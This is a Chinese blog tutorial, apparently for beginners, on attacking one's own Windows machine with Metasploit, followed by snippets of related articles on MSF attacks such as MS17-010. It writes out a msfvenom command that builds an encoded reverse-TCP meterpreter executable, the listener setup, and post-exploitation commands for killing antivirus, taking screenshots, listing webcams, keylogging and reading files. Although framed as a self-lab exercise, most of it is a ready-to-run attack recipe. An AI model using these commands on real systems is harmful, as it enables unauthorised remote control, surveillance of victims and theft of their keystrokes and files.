用msf模拟攻击自己的window,msf基础

已于 2022-07-31 17:20:41 修改
阅读量1k 收藏 4
点赞数
文章标签: web安全 windows linux
于 2022-07-31 13:38:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62584974/article/details/126084050
版权

生成shell

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.88 lport=10105 -i 5 -f exe -o /root/windows_shell.exe
msfvenom参数

-p payload

-lhost 本机ip

-lport 监听的端口

-i  次数

-o 保存

-f 编译

-e 编码

 

 把它放到桌面

 然后用msf监听端口 --开启msf

msfconsole

use exploit/multi/handler --使用监听模块

use exploit/multi/handler

show options --查看输入的可选项

show options

设置payload--和生成shell参数设置一致

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.159.88 --kali地址

set lhost 192.168.159.88

set lport 10105 --shell接受端口

set lport 10105

run --运行,开启监听

run

 

监听成功 

系统命令

查看版本

命令

sysinfo

查看当前账户

getuid

 

查看当前处于本地的哪个目录:

getlwd

查看是否运行在虚拟机上

run post/windows/gather/checkvm

 

查看运行时间

idletime

关闭杀毒软件:run killav

run killav

 

查看当前属于目标机的工作目录的路径名称:pwd

pwd

 

列出当前目录的所有文件:ls

ls

 

查看目标1.txt文件内内容:

cat 1.txt 

 

拍照桌面

screenshot

寻找摄像头

webcam_list

 

杀死进程 进程的PID

kill  进程的PID

记录键盘

keyscan_start

输出

keyscan dump

退出监听

输入background可以暂时退出监听页面,然后sessions可以查看进度然后 session+数字就可回到进度

墨言ink
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 3152
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
msf攻击(1)
clood的博客
03-20 280
msf学习
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
最新发布
zzz6583zz的博客
06-15 981
l, --list <type> 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload <payload> 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format <format> 指定输出格式-e, --encoder <encoder> 指定需要使用的encode,指定需要使用的编码。
msf攻击windows实例
qq_52712762的博客
05-30 1572
环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)方法二:通过web站点,上传webshel,返回给msfmsfvenom)方法三:攻击其他端口服务,拿到meterpreter(445)
Metasploit(MSF)的使用 对计算机软件漏洞实施攻击
erfan_lang的博客
08-13 204
MSF的使用教程
msf攻击Mysql服务.docx
04-26
本文将深入探讨如何使用MSF对MySQL服务进行攻击,以及涉及到的相关知识点。 首先,让我们了解MSF中与MySQL相关的几个主要插件: 1. **auxiliary/scanner/mysql/mysql_login**:此模块用于扫描内网中的MySQL服务器...
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文中包含了命令和步骤,很详细,给初学者作为参考。
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
基础电子中的MSF业务框架与IMS的关系
11-14
为解决这个问题,MSF通过全球MSF互操作活动(GMl2006)推动IMS基础设施的测试,以确保跨运营商的互操作性和协议有效性。2006年的全球测试活动展示了MSF R3执行协议在多运营商环境中的实用性。 **下一代网络(NGN)...
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)
渗透、攻防、CTF、编程
10-12 3459
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境) 0x01 知识点 MSF工具的利用,ms17-010漏洞实验 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.129) 目标机:win7(ip:192.168.233.130) 0x03 实验准备 启动msf,输入msfconsole 检错漏洞库,输入search ms ,盐城msf库里存在ms17-010漏洞 3、nmap检测目标机开放端口 nmap –..
使用 msf 渗透攻击 win7 主机并远程执行命令
枫梓林のBlog
04-21 3732
使用 msf 渗透攻击 win7 主机并远程执行命令 文章目录使用 msf 渗透攻击 win7 主机并远程执行命令一、扫描局域网存活的主机并判断是否是目标主机1.1 使用 netdiscover 判断该局域网内 IP网段1.2 使用 nmap 扫描 该网段 判断目标主机二、通过Nessus 扫描该主机漏洞三、通过msf模块获取win7主机远程shell总结 实验环境 Win7 旗舰版 SP1 -64 位 kali Linux 2019.1a Nessus 一、扫描局域网存活的主机并判断是否是目标主机
模拟计算机网络攻击,计算机网络安全技术与实施实训指导1.2-1基于SnifferPro进行协议、模拟攻击分析...
weixin_39890708的博客
07-05 344
网络技术专业教学资源库ARP的数据帧再进行改造(可以捕获一个网关的ARP数据帧)。设置Sniffer Pro捕获ARP 通信的数据包(工作站1与网关之间)在工作站1上再次启动Sniffer Pro软件,并设置捕获过滤条件(Define Filter),选择捕获ARP协议。第2步:要想工作站1发送ARP请求给网关,并得到ARP回应,首先启动Sniffer Pro 捕获,然后利用”arp –d”清除A...
木马的攻击与防御(MSF
weixin_45605352的博客
04-12 6865
MSF简介 Metasploit是一个免费的、可下载的框架, 通过它可以很容易地 获取、开发并对计算机软件漏洞实施攻击。它本身 附带数百个 已知软件漏洞的专业级漏洞攻击工具。它集成了以下4个模块: exploits模块 漏洞攻击模块列表,入侵式 命名规则 模块/系统/服务/名称 payloads模块 漏洞负载模块与exploits模块配合使用的用于入侵后的操作 auxiliary模块 辅助模块,通常用于没有攻击荷载的漏洞攻击。 encoders模块 编码器模块,用于msfvenom -e or
msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听
weixin_53884648的博客
10-11 5110
利用msfconsole进行永恒之蓝漏洞攻击,并且使用msfvonom进行Windows木马生成,之后通过msf把木马上传到目标机器,使用msf监听模块进行后渗透权限维持。
b4_python与msf交互实现的自动攻击
yeshankuangrenaaaaa的博客
01-09 2201
本文是草稿,很多未整理完 ! 各位凑合着看先 延续b3文提到的思路,这里提供实现的方式。 step1 文件 startConfig.rc start_msf.py python借助pymsf模块与msf的msgrpc插件实现交互控制,那么前提就是我们已经启动了msf,并且加载了msgrpc插件,完成了msgrpc的配置。 我们这里利用msf中的resource script章节提到的.rc文件...
关于使用msf渗透攻击Win7主机并远程执行命令的复习
weixin_44663190的博客
04-16 5516
关于使用msf渗透攻击Win7主机并远程执行命令的复习 一、关于环境的搭建 攻击机:kali 靶机:win7 旗舰版 sp1 win版本这里最好就下载我所指出的版本,因为其他版本由于系统和补丁不同可能会出现漏洞无法利用情况 关于kali系统和win7 旗舰版sp1的安装就不多赘述,很多博文都已经讲述 1.1 打开虚拟机软件,准备开始环境 1.2 打开已经配置好的两个虚拟环境 1.3 配置...
网络安全与渗透:漏洞攻击—— msf(四)此生无悔入华夏,男儿何不带吴钩
qq_25490573的博客
08-26 1136
目录msf简介msfconsole基本命令 msf简介  msf(The Metasploit framewok)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 msfconsole 作用:管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。 运行命令 msfconsole 数字代表模块功能数量 模块简介: exploits:利用漏洞进行攻击模块 payloads:攻击载荷(攻击效果
MSF基础攻击实践报告
weixin_30651273的博客
09-01 243
MSF基础攻击实践 MSF的六个模块:exploit,encoder,payload,aux,post,nops exploit——渗透攻击模块 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。 exploits总的来说共分为两类溢出(exploit)攻击方法...
内网MSF基础:PostgreSQL配置与权限管理教程
这篇文章为读者提供了一个在内网环境中配置MSF所需的基础数据库管理和用户权限设置的步骤,这对于使用MSF进行渗透测试或安全评估的人来说是至关重要的。后续的配置步骤可能会根据实际需求和环境有所不同,但这些基础...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值